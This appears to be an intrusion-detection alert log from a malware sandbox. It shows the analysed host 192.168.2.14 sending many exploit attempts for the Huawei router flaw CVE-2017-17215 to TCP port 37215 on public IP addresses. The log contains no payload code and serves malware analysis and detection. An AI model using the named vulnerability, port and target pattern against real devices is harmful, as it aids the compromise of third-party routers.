                                                    07/10/24-08:26:17.928888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160037215192.168.2.14157.8.237.143
                                                    07/10/24-08:27:07.297213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315037215192.168.2.1441.14.88.52
                                                    07/10/24-08:27:22.562470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343237215192.168.2.149.35.50.160
                                                    07/10/24-08:26:13.833898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933037215192.168.2.14209.61.40.242
                                                    07/10/24-08:26:59.723852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939637215192.168.2.1460.255.228.162
                                                    07/10/24-08:26:53.207005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860637215192.168.2.14197.212.217.137
                                                    07/10/24-08:27:19.224533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956437215192.168.2.14157.86.203.199
                                                    07/10/24-08:26:36.429054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661237215192.168.2.1441.160.143.248
                                                    07/10/24-08:26:25.522450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009437215192.168.2.14119.176.248.135
                                                    07/10/24-08:26:45.636858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490837215192.168.2.14197.156.122.20
                                                    07/10/24-08:27:02.968818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209237215192.168.2.14135.187.76.71
                                                    07/10/24-08:26:49.851941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297637215192.168.2.14169.21.175.67
                                                    07/10/24-08:26:22.224405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740837215192.168.2.14157.18.47.189
                                                    07/10/24-08:27:30.542154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118037215192.168.2.14197.161.49.136
                                                    07/10/24-08:26:43.757407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065237215192.168.2.1441.200.217.213
                                                    07/10/24-08:27:02.922365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434437215192.168.2.14160.27.35.109
                                                    07/10/24-08:26:52.077860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787837215192.168.2.14204.193.8.39
                                                    07/10/24-08:27:08.389316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5389237215192.168.2.14198.122.212.37
                                                    07/10/24-08:26:57.682663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471837215192.168.2.1478.126.131.207
                                                    07/10/24-08:26:49.868022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279237215192.168.2.14157.118.157.58
                                                    07/10/24-08:27:36.280780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571637215192.168.2.14150.90.67.77
                                                    07/10/24-08:26:20.128775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014837215192.168.2.1441.5.228.35
                                                    07/10/24-08:26:38.652813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361837215192.168.2.1441.172.192.93
                                                    07/10/24-08:27:05.143313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500237215192.168.2.14157.15.66.46
                                                    07/10/24-08:26:11.598573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767837215192.168.2.14197.159.115.4
                                                    07/10/24-08:26:26.589238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840637215192.168.2.1441.0.150.251
                                                    07/10/24-08:27:02.860039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474837215192.168.2.14157.28.41.23
                                                    07/10/24-08:26:41.348022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255837215192.168.2.1441.192.156.234
                                                    07/10/24-08:26:15.871447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028037215192.168.2.1459.38.200.192
                                                    07/10/24-08:27:27.168343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250837215192.168.2.14157.220.242.247
                                                    07/10/24-08:26:33.189218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3367437215192.168.2.14197.58.184.78
                                                    07/10/24-08:26:59.783128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310437215192.168.2.14157.240.40.9
                                                    07/10/24-08:26:48.018095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477437215192.168.2.1441.42.33.4
                                                    07/10/24-08:27:10.699441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046037215192.168.2.14165.181.126.75
                                                    07/10/24-08:26:52.036336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191437215192.168.2.14144.119.180.44
                                                    07/10/24-08:27:24.887347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943237215192.168.2.14197.82.183.80
                                                    07/10/24-08:26:29.877616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3682237215192.168.2.14197.250.245.112
                                                    07/10/24-08:26:55.424218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806837215192.168.2.14157.56.251.114
                                                    07/10/24-08:27:31.453748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903237215192.168.2.14157.40.166.76
                                                    07/10/24-08:27:14.667183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454437215192.168.2.1441.242.107.173
                                                    07/10/24-08:26:17.962280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974037215192.168.2.1441.188.142.243
                                                    07/10/24-08:26:43.752339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773437215192.168.2.14197.233.204.4
                                                    07/10/24-08:27:10.561451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300637215192.168.2.1441.47.189.24
                                                    07/10/24-08:26:41.285291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623437215192.168.2.1441.49.44.228
                                                    07/10/24-08:26:41.630428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194237215192.168.2.14176.72.16.247
                                                    07/10/24-08:27:00.596679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396437215192.168.2.14197.99.105.63
                                                    07/10/24-08:27:13.993007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673837215192.168.2.14157.80.1.254
                                                    07/10/24-08:27:10.547340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695437215192.168.2.1441.140.236.224
                                                    07/10/24-08:26:55.350146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299637215192.168.2.14197.232.90.96
                                                    07/10/24-08:26:11.565861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013037215192.168.2.1441.209.73.122
                                                    07/10/24-08:26:15.842184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198637215192.168.2.1441.88.252.6
                                                    07/10/24-08:26:55.454904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361037215192.168.2.14157.188.245.135
                                                    07/10/24-08:27:05.096875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242437215192.168.2.14197.41.176.182
                                                    07/10/24-08:26:28.649292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221837215192.168.2.14157.17.146.163
                                                    07/10/24-08:26:42.432411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991437215192.168.2.14157.32.112.4
                                                    07/10/24-08:26:26.564107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027837215192.168.2.14197.163.90.119
                                                    07/10/24-08:26:44.496105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4477437215192.168.2.1441.108.91.244
                                                    07/10/24-08:26:55.392716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487237215192.168.2.14157.164.188.120
                                                    07/10/24-08:27:30.428214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594037215192.168.2.14197.224.140.96
                                                    07/10/24-08:26:59.529956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300637215192.168.2.14202.40.232.210
                                                    07/10/24-08:27:24.894621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.1441.71.47.165
                                                    07/10/24-08:26:15.799288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246837215192.168.2.1441.153.250.244
                                                    07/10/24-08:27:08.399018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863837215192.168.2.1441.240.155.134
                                                    07/10/24-08:27:13.857998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839837215192.168.2.14157.234.67.18
                                                    07/10/24-08:26:26.598533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878837215192.168.2.14157.207.125.231
                                                    07/10/24-08:26:22.213907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688037215192.168.2.14130.141.236.208
                                                    07/10/24-08:26:28.830687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856637215192.168.2.14197.230.186.3
                                                    07/10/24-08:27:13.960934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627837215192.168.2.14157.185.104.135
                                                    07/10/24-08:26:28.795318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797237215192.168.2.14157.216.9.120
                                                    07/10/24-08:26:52.048430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763437215192.168.2.1468.249.160.138
                                                    07/10/24-08:26:31.054322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866837215192.168.2.14157.220.2.95
                                                    07/10/24-08:26:53.199768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824437215192.168.2.1441.255.236.161
                                                    07/10/24-08:26:43.748441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362637215192.168.2.14142.254.158.214
                                                    07/10/24-08:26:18.016670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991637215192.168.2.1441.108.169.133
                                                    07/10/24-08:27:23.952903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283437215192.168.2.1441.65.218.72
                                                    07/10/24-08:26:13.794548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442237215192.168.2.14157.239.242.139
                                                    07/10/24-08:26:26.583473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166637215192.168.2.14157.180.150.127
                                                    07/10/24-08:26:45.651870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259837215192.168.2.14157.78.2.93
                                                    07/10/24-08:26:36.401394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499437215192.168.2.14197.18.220.39
                                                    07/10/24-08:27:22.835988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003237215192.168.2.14157.67.87.62
                                                    07/10/24-08:27:08.398015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274837215192.168.2.1441.27.8.189
                                                    07/10/24-08:26:11.512950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907237215192.168.2.1461.176.198.121
                                                    07/10/24-08:26:41.490874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101837215192.168.2.1471.233.161.79
                                                    07/10/24-08:27:30.450144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719237215192.168.2.14197.209.209.13
                                                    07/10/24-08:26:42.164122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747237215192.168.2.14157.53.221.75
                                                    07/10/24-08:27:08.389316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952437215192.168.2.1441.107.76.151
                                                    07/10/24-08:26:57.677011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860437215192.168.2.1441.219.225.171
                                                    07/10/24-08:26:53.145765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797637215192.168.2.14197.112.218.101
                                                    07/10/24-08:26:28.835620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880037215192.168.2.1441.51.52.121
                                                    07/10/24-08:27:08.444805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508037215192.168.2.14157.232.171.116
                                                    07/10/24-08:27:07.288154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992437215192.168.2.1441.106.152.205
                                                    07/10/24-08:27:10.655390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929037215192.168.2.1441.75.172.98
                                                    07/10/24-08:27:32.602329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097637215192.168.2.14133.240.49.33
                                                    07/10/24-08:26:25.511817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672637215192.168.2.14120.68.49.100
                                                    07/10/24-08:26:29.864679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706237215192.168.2.14157.205.122.56
                                                    07/10/24-08:26:59.623619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021237215192.168.2.14197.166.17.35
                                                    07/10/24-08:27:08.412825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3480637215192.168.2.1441.241.177.152
                                                    07/10/24-08:27:17.099903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328837215192.168.2.14197.172.117.41
                                                    07/10/24-08:27:28.140303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338237215192.168.2.1479.119.209.0
                                                    07/10/24-08:27:23.925021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869437215192.168.2.1441.34.241.131
                                                    07/10/24-08:26:57.636058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456837215192.168.2.14197.53.222.62
                                                    07/10/24-08:26:22.276470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644037215192.168.2.14197.22.238.205
                                                    07/10/24-08:27:30.428710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348637215192.168.2.14157.81.227.177
                                                    07/10/24-08:27:19.230409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347037215192.168.2.14157.103.183.116
                                                    07/10/24-08:26:34.234047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694437215192.168.2.14197.144.129.82
                                                    07/10/24-08:27:07.384815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178637215192.168.2.14197.135.249.34
                                                    07/10/24-08:26:20.133795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683037215192.168.2.14157.91.222.23
                                                    07/10/24-08:26:18.016670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416837215192.168.2.14157.61.126.77
                                                    07/10/24-08:26:59.879112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821637215192.168.2.1441.21.16.168
                                                    07/10/24-08:26:41.571728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5210237215192.168.2.14197.72.124.138
                                                    07/10/24-08:26:57.654674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489837215192.168.2.14157.120.84.86
                                                    07/10/24-08:26:47.835000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677237215192.168.2.14146.33.33.62
                                                    07/10/24-08:26:38.596946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808037215192.168.2.1483.53.47.64
                                                    07/10/24-08:26:45.607530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634837215192.168.2.1441.35.242.255
                                                    07/10/24-08:26:31.081950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434037215192.168.2.14208.136.27.245
                                                    07/10/24-08:26:13.778927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064437215192.168.2.1491.77.13.177
                                                    07/10/24-08:27:22.573004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807437215192.168.2.14157.169.182.160
                                                    07/10/24-08:27:10.561915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877837215192.168.2.14128.55.253.22
                                                    07/10/24-08:27:17.066216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163837215192.168.2.1441.245.73.52
                                                    07/10/24-08:26:41.535361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634637215192.168.2.14170.239.39.102
                                                    07/10/24-08:27:14.878882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987237215192.168.2.1441.79.38.167
                                                    07/10/24-08:26:23.280858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476837215192.168.2.1441.175.244.182
                                                    07/10/24-08:26:18.012780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420437215192.168.2.1495.181.29.177
                                                    07/10/24-08:26:31.103598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630237215192.168.2.14157.1.68.162
                                                    07/10/24-08:27:23.913193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5195437215192.168.2.1492.119.216.5
                                                    07/10/24-08:26:49.853499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118437215192.168.2.14121.114.55.252
                                                    07/10/24-08:27:32.521553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3333637215192.168.2.14162.228.145.144
                                                    07/10/24-08:26:43.656959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4143637215192.168.2.1441.225.152.150
                                                    07/10/24-08:27:22.835160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520637215192.168.2.14197.72.156.205
                                                    07/10/24-08:26:26.597424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695437215192.168.2.14157.132.125.24
                                                    07/10/24-08:26:41.569815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860237215192.168.2.14173.147.37.204
                                                    07/10/24-08:27:07.379672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538637215192.168.2.14197.178.8.79
                                                    07/10/24-08:26:26.591213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643437215192.168.2.14197.101.112.153
                                                    07/10/24-08:27:08.425890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5665637215192.168.2.1441.54.101.2
                                                    07/10/24-08:26:36.387027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690037215192.168.2.1441.33.243.194
                                                    07/10/24-08:26:55.417954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392037215192.168.2.14157.3.6.36
                                                    07/10/24-08:26:15.813714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507837215192.168.2.14157.18.177.200
                                                    07/10/24-08:26:20.185610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973437215192.168.2.1441.20.133.163
                                                    07/10/24-08:26:48.009265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046637215192.168.2.14113.80.184.254
                                                    07/10/24-08:26:17.976557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417237215192.168.2.1493.255.64.73
                                                    07/10/24-08:27:14.835565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540837215192.168.2.1441.95.172.25
                                                    07/10/24-08:26:36.362536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412037215192.168.2.14137.189.32.9
                                                    07/10/24-08:27:24.891062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348037215192.168.2.14157.73.106.152
                                                    07/10/24-08:26:36.437986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526837215192.168.2.14153.161.239.3
                                                    07/10/24-08:27:14.885671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.1441.30.211.180
                                                    07/10/24-08:26:11.116363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424237215192.168.2.14164.106.102.194
                                                    07/10/24-08:26:11.177651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458837215192.168.2.14197.186.174.45
                                                    07/10/24-08:26:20.152800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238837215192.168.2.1441.137.10.96
                                                    07/10/24-08:26:59.852225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062637215192.168.2.1441.120.103.74
                                                    07/10/24-08:27:22.472271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627837215192.168.2.14157.241.18.145
                                                    07/10/24-08:26:51.939250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185637215192.168.2.1441.2.198.212
                                                    07/10/24-08:26:59.646410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908637215192.168.2.14197.223.24.65
                                                    07/10/24-08:27:14.853796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395437215192.168.2.14197.213.55.176
                                                    07/10/24-08:26:31.078993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550037215192.168.2.1441.220.122.83
                                                    07/10/24-08:27:32.587854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056237215192.168.2.14197.227.181.191
                                                    07/10/24-08:26:43.872861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479837215192.168.2.14197.189.7.195
                                                    07/10/24-08:27:07.397077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860037215192.168.2.14197.14.222.171
                                                    07/10/24-08:26:29.865675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826237215192.168.2.14166.203.102.127
                                                    07/10/24-08:26:25.449371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685237215192.168.2.14157.10.86.157
                                                    07/10/24-08:26:57.637294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374037215192.168.2.14157.71.228.236
                                                    07/10/24-08:26:43.878190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775637215192.168.2.14157.155.85.207
                                                    07/10/24-08:26:47.844499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694637215192.168.2.14217.224.239.19
                                                    07/10/24-08:26:52.082361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472437215192.168.2.14197.49.226.95
                                                    07/10/24-08:26:59.783807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567037215192.168.2.1441.178.161.85
                                                    07/10/24-08:27:34.119507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584437215192.168.2.14197.217.64.68
                                                    07/10/24-08:26:17.996643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921237215192.168.2.14157.31.93.223
                                                    07/10/24-08:26:26.596557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327437215192.168.2.1441.172.57.157
                                                    07/10/24-08:27:22.810148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770237215192.168.2.14149.44.145.217
                                                    07/10/24-08:26:59.519800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244837215192.168.2.14157.61.161.8
                                                    07/10/24-08:26:17.954473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765037215192.168.2.14157.119.106.159
                                                    07/10/24-08:26:18.036977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907837215192.168.2.14197.55.78.117
                                                    07/10/24-08:26:38.573653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295837215192.168.2.14157.90.21.245
                                                    07/10/24-08:26:20.153663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371437215192.168.2.14157.222.47.0
                                                    07/10/24-08:27:23.942038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265837215192.168.2.1441.132.187.207
                                                    07/10/24-08:26:17.986594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584237215192.168.2.14197.20.120.184
                                                    07/10/24-08:26:20.132092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663037215192.168.2.1441.102.49.143
                                                    07/10/24-08:26:28.637197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5873637215192.168.2.14157.222.168.247
                                                    07/10/24-08:27:34.127270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702437215192.168.2.1427.135.208.242
                                                    07/10/24-08:26:13.833831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823237215192.168.2.1441.130.69.12
                                                    07/10/24-08:26:22.296944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060837215192.168.2.1441.169.22.166
                                                    07/10/24-08:26:26.599600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220837215192.168.2.14196.130.26.26
                                                    07/10/24-08:26:45.645798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805437215192.168.2.1483.58.75.253
                                                    07/10/24-08:26:36.368496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364437215192.168.2.1441.154.71.171
                                                    07/10/24-08:26:43.748441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719837215192.168.2.1475.64.105.131
                                                    07/10/24-08:26:23.297905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871837215192.168.2.14163.76.106.6
                                                    07/10/24-08:27:23.939164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356437215192.168.2.14197.24.191.215
